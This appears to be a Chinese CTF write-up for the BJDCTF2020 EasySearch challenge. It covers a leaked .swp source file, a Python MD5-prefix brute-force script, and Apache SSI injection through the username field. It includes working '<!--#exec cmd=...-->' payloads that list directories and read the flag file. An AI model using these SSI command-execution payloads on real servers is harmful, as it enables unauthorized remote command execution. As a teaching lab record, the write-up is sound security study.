来自
[BJDCTF2020]EasySearch
一打开是一个登录框,首先试了试sql注入,没啥反应。源码也没啥东西,用dirsearch一扫扫到个index.php.swp,直接访问得到验证源码:
审计一下,它对登录框的用户名没啥要求,但是密码的MD5值前六位必须是6d0bc1,写个脚本梭一下:
import hashlib a = "0123456789" for o in a: for p in a: for q in a: for r in a: for s in a: for t in a: for u in a: b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u) md5 = hashlib.md5(b.encode('utf-8')).hexdigest() if((md5[0:6])=='6d0bc1'): print(b)
也可以:
<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times $content = uniqid().$random; return sha1($content); } header("Content-Type: text/html;charset=utf-8"); *** if(isset($_POST['username']) and $_POST['username'] != '' ) { $admin = '6d0bc1'; if ( $admin == substr(md5($_POST['password']),0,6)) { echo "<script>alert('[+] Welcome to manage system')</script>"; $file_shtml = "public/".get_hash().".shtml"; $shtml = fopen($file_shtml, "w") or die("Unable to open file!"); $text = ' *** *** <h1>Hello,'.$_POST['username'].'</h1> *** ***'; fwrite($shtml,$text); fclose($shtml); *** echo "[!] Header error ..."; } else { echo "<script>alert('[!] Failed')</script>"; }else { *** } *** ?>
得到:
随便输个admin和2020666登录成功。
但是进去啥也没有。
这时候想到bp抓包看一下,resp看到个东西:
直接访问,看到用户名这里有回显:
搜了下发现这里是Apache的SSI远程命令执行漏洞。
借用https://blog.csdn.net/Yb_140/article/details/127548454
解释一下SSI是什么:
SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。
从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。
当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令。
题目中username
被写入了shtml
文件,就可以将username改为
<!--#exec cmd="ls"-->
再用这个shtml去访问:
没找到flag。
推测在根目录,这里用的命令:(记得url编码)
<!--#exec cmd="ls /"-->
啥也没有,奇怪了。
那就猜是不是就在网站上一个目录,用命令:(这里加号+也可以用空格%20写)
<!--#exec+cmd="ls+../"-->
url编码,再传再看:
发现flag。
然后用命令:
<!--#exec+cmd="cat+../flag_990c66bf85a09c664f0b6741840499b2"-->
再传url编码后的,得到flag:
提一嘴这里我如果把加号 + url编码成了%2B传进去就ERROR了,只能传原始的加号 + 。
但是空格%20就没有这个问题。
标签:shtml,url,漏洞,HTML,SSI,str,Apache,页面 From: https://www.cnblogs.com/EddieMurphy-blogs/p/17746379.html